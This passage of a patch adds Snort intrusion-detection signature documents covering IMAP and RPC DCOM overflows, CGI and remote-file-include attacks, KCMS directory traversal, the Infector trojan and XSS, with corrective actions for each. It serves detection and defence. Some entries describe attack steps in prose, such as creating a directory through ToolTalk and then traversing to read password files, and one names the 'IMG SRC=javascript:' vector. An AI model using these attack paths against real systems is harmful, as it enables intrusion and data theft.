+argument in the AUTH command to an internal IMAP server, indicating an
+attempt to exploit a buffer overflow vulnerability in Netscape Messaging
+Server and University of Washington IMAP implementations. This may also
+affect other IMAP server implementations.
+
+--
+Impact:
+Remote execution of arbitrary code with the security privileges of the
+IMAP process, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+A buffer overflow vulnerability exists in the AUTHENTICATE command in
+University of Washington IMAP and Netscape Messaging Server. This can
+allow a remote attacker to send an AUTHENTICATE command with a
+malformed, overlong argument to a vulnerable IMAP server, causing a
+buffer overflow condition. The attacker can then execute arbitrary code
+on the server with the security privileges of the IMAP server process.
+
+--
+Affected Systems:
+	Netscape Messaging Server 3.55 and earlier
+	University of Washington imapd 10.234 and earlier.
+
+--
+Attack Scenarios:
+An attacker sends an overly long, malformed argument to an AUTHENTICATE
+command to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker may then be able to execute arbitrary code on the
+server with the security privileges of the IMAP server process.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches have been released for both UW IMAP and Netscape Messaging
+Server. Apply the patch or upgrade to a Netscape Messaging Server
+version higher than 3.55 or UW IMAP version higher than 10.234.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+--
--- /dev/null
+++ b/doc/signatures/3165.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3165
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1850.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1850
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1231.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1231
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3454.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3454
+
+--
+Summary:
+This event is generated when an attempt is made to probe for
+information on a host running Arkeia Client Backup server.
+
+--
+Impact:
+This may be reconnaissance to find version or operating
+system information about the Arkeia Client Backup server
+to later run an appropriate exploit.
+
+--
+Detailed Information:
+By default, Arkeia Client Backup servers do not require any
+authentication for informational requests.  An attacker who
+may be planning to exploit a vulnerable version of the software
+may attempt to request file or system information.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker can attempt to query an Arkeia Client Backup
+server for system or file information.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known. If you run Arkeia Client Backup on your network,
+make sure that your the variable $EXTERNAL_NET is configured
+to reflect IP addresses outside of your network.  Otherwise,
+this rule will alert on valid internal traffic.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
--- /dev/null
+++ b/doc/signatures/3284.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3284
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1933.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1933
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2158.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+2158
+
+--
+Summary:
+This event is generated when an invalid BGP session is detected. 
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event indicates that an invalid Border Gateway Protocol (BGP) packet has been detected.
+
+BGP packets must have a datasize of at least 20 bytes. This event indicates that a BGP packet was detected with a datasize less than this amount. TCPDump may enter an endless loop trying to process this packet.
+
+--
+Affected Systems:
+This BGP packet may cause problems with TCPDump.
+
+--
+Attack Scenarios:
+An attacker would need to craft a special BGP packet with a type of 0 or a datasize of less than 20 bytes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000600.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000600
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_markpaid.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"inv_markpaid.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000750.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000750
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "index.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000112.txt
@@ -0,0 +1,68 @@
+Rule: 
+
+--
+Sid: 
+100000112
+
+-- 
+Summary: 
+This event is generated when the readfile.tcl script on a Nokia IPSO device is 
+accessed.
+
+-- 
+
+Impact: 
+Since the script does not perform any input validation, users can read any file 
+on the host operating system for which the script has permissions. 
+
+--
+Detailed Information:
+An attacker may specify any file on the host operating system, and if the 
+script has read permissions for that file, it will be displayed in the web 
+browser. Users must be able to log into the Nokia web gui to perform this 
+attack.
+
+--
+Affected Systems:
+Nokia IPSO 3.3 SP4
+Nokia IPSO 3.3 SP3
+Nokia IPSO 3.3 SP2
+Nokia IPSO 3.3 SP1
+Nokia IPSO 3.3
+Nokia IPSO 3.3.1
+Nokia IPSO 3.4
+Nokia IPSO 3.4.1
+Nokia IPSO 3.4.2
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited using a web browser, or an automated script.
+
+-- 
+
+Ease of Attack: 
+Simple, as attacks may be performed via a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, no workarounds or patches are available.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/120.txt
@@ -0,0 +1,112 @@
+Rule:
+
+--
+Sid:
+120
+
+--
+Summary:
+Infector is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Infector sever to
+programs normally started on boot. Due to the nature of this Trojan it 
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	117	Infector 1.x
+	120	Infector 1.6 Server to Client
+	121	Infector 1.6 Client to Server Connection Request
+
+This Trojan is commonly used to install other Trojan programs.
+
+The Trojan also makes changes to the system registry and win.ini file.
+
+Notification of an active server is achieved via IRC or ICQ.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup 
+copy is made and usually named D3x32.drv.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added are:
+
+	apxil32 = apxil32.exe
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Apxil32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected 
+machine is recommended.
+
+A change is also made to the win.ini file, the line run=apxil32.exe 
+apxil32.exe is added and should be deleted.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS315
+http://www.whitehats.com/info/IDS502
+http://www.whitehats.com/info/IDS503
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/infector.htm
+
+Megasecurity:
+http://www.megasecurity.org/trojans/i/infector/Infector_all.html
+
+Simovits:
+http://www.simovits.com/trojans/tr_data/y1627.html
+
+--
--- /dev/null
+++ b/doc/signatures/3348.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3348
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1193.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1193
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1667.txt
@@ -0,0 +1,75 @@
+Rule:
+--
+Sid:
+1667
+--
+Summary:
+This event indicates that a cross-site scripting attack using the "img 
+src=javascript" vulnerability is being attempted, or a potential 
+attacker is testing your site to determine if it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site.   Attackers can potentially gain access to your users 
+cookies or session ids, allowing the attacker to impersonate your 
+user.   They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input and then uses that input as 
+part of the HTML of a new page without filtering, the application is 
+vulnerable to cross-site scripting.  The traditional means of exploiting
+this is to embed a "<SCRIPT>" tag into the input.   However, as many 
+applications now look for this attack vector, exploitation of the 
+ability to use "IMG SRC=javascript:" to embed javascript without the 
+script tag is becoming more common.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim.  The email will contain a link to a 
+specially crafted URL which contains the exploit.   When the victim 
+clicks on the link, they are directed to the vulnerable web site and the
+attack code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable.  Finding vulnerabilities in other, including proprietary, 
+web applications is fairly trivial and existing exploit code could 
+easily be modified to take advantage of newly discovered 
+vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the "IMG SRC=javascript:" directive 
+could trigger this alert under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, 
+contact the authors or vendor and see if there is a patch or newer 
+version.   If the application is proprietary to you or your company, 
+ensure that it properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+iDefense
+http://www.idefense.com/idpapers/XSS.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/1642.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1642
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2349.txt
@@ -0,0 +1,55 @@
+Rule:  
+
+--
+Sid:
+2349
+
+--
+Summary:
+This event is generated when an attempt is made to enumerate the printer
+service on a system using DCE RPC.
+
+--
+Impact:
+Intelligence gathering.
+
+--
+Detailed Information:
+This rule checks for an attempt to enumerate a print spool service using DCE RPC. 
+This may be an attempt to check for printer and printer services available on a
+host.
+
+--
+Affected Systems:
+	All Microsoft DCE RPC enabled systems
+	
+--
+Attack Scenarios:
+An attacker may identify the print service being used and exploit that
+information in further attacks against the system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/700.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+700
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2007.txt
@@ -0,0 +1,90 @@
+Rule:
+
+--
+Sid:
+2007
+
+--
+Summary:
+KCMS (Kodak Color Management System) is an RPC (Remote Procedure Call)
+service for Sun Solaris operating systems. It is able to read profiles
+stored on remote machines. It is possible for an attacker to bypass
+directory traversal checks and read any file on the remote system.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine not limited to user accounts
+and business data.
+
+--
+Detailed Information:
+The attacker first needs to create a directory under
+/etc/openwin/devdata/profiles or /usr/openwin/etc/devdata/profiles,
+using the ToolTalk database server is one method of creating a
+directory. Once this has been achieved, the attacker is then able to
+perform the directory traversal.
+
+The directory traversal allows the attacker to read any file on the
+compromised system. Once a sensitive system file such as the system
+password database has been retrieved, the attacker may use other tools
+at his leisure to discover username and password information. This may
+lead to further system compromise.
+
+The KCMS daemon runs with root privileges and is typically started on
+boot via inetd. The ToolTalk database server is also commonly installed
+and started in this manner. The KCMS daemon usually listens on TCP port
+32871 although this can vary.
+
+--
+Affected Systems:
+	Sun Microsystems Solaris 2.5.1 (Sparc/Intel)
+	Sun Microsystems Solaris 2.6 (Sparc/Intel)
+	Sun Microsystems Solaris 7 (Sparc/Intel)
+	Sun Microsystems Solaris 8 (Sparc/Intel)
+	Sun Microsystems Solaris 9 (Sparc/Intel)
+
+--
+Attack Scenarios:
+The ToolTalk database server procedure TT_ISBUILD can be used to create
+a directory named TT_DB anywhere on a remote system. Creation of this
+directory then allows the attacker to use directory traversal to further
+compromise the machine.
+
+--
+Ease of Attack:
+Once the directory has been created, further compromise is simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the KCMS daemon in the file /etc/inetd.conf. Kill any running
+KCMS processes and restart the inet daemon.
+
+Configure your firewall to restrict external access to the TCP and UDP
+port 111 used by the RPC port mapper service and the range used by RPC
+services, typically 32700 to 34000.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/850785
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0027
+
+--
--- /dev/null
+++ b/doc/signatures/100000799.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000799
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c4" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
